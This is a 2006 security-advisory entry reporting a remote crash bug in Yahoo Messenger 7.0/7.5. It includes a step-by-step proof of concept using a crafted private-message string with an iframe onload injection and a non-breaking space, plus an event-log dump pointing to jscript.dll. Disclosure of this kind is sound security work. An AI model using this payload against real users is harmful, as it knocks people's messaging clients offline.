Yahoo messenger bug

2006-06-22T00:00:00
ID SECURITYVULNS:DOC:13274
Type securityvulns
Reporter Securityvulns
Modified 2006-06-22T00:00:00

Description

Hi, I found a vulnerability in yahoo messenger that if you receive a Private message with this string "msg:---------------------------------------------iframe onload=$InlineAction()>:)"(without quotes)Yahoo messenger will Crash with a runtime error. Remote crash proof of concept: 1. Open messenger and log it. 2. Open a yahoo chat third party like yahelite version 269 through Ymsgr protocol and log it with another account. 3. Send a Pm to the messenger account with this string: "s: msg :---------------------------------------------iframe onload=$InlineAction()>:)" (without quotes) 4. The remote user will crash closing down her messenger. Note: "msg :" this space must be created with alt+0160. s:(space)msg(alt+0160):---------------------------------------------iframe onload=$InlineAction()>:)

Tested in yahoo messenger 7.0/7.5 I didn't tried it in Yahoo messenger 8.0 Beta yet This is the event log 0000: 41 70 70 6c 69 63 61 74 Applicat 0008: 69 6f 6e 20 46 61 69 6c ion Fail 0010: 75 72 65 20 20 79 70 61 ure ypa 0018: 67 65 72 2e 65 78 65 20 ger.exe 0020: 37 2e 30 2e 30 2e 34 33 7.0.0.43 0028: 38 20 69 6e 20 6a 73 63 8 in jsc 0030: 72 69 70 74 2e 64 6c 6c ript.dll 0038: 20 35 2e 36 2e 30 2e 38 5.6.0.8 0040: 38 33 31 20 61 74 20 6f 831 at o 0048: 66 66 73 65 74 20 30 30 ffset 00 0050: 30 31 36 38 39 31 0d 0a 016891.. I have installed the latest version of jscript.dll but the problem continues. So do you have any information about this issue? I discover that it's a vulnerability exploited in the wild since february but i don't have enough information. Regards


1GB gratis, Antivirus y Antispam Correo Yahoo!, el mejor correo web del mundo Abrí tu cuenta aquí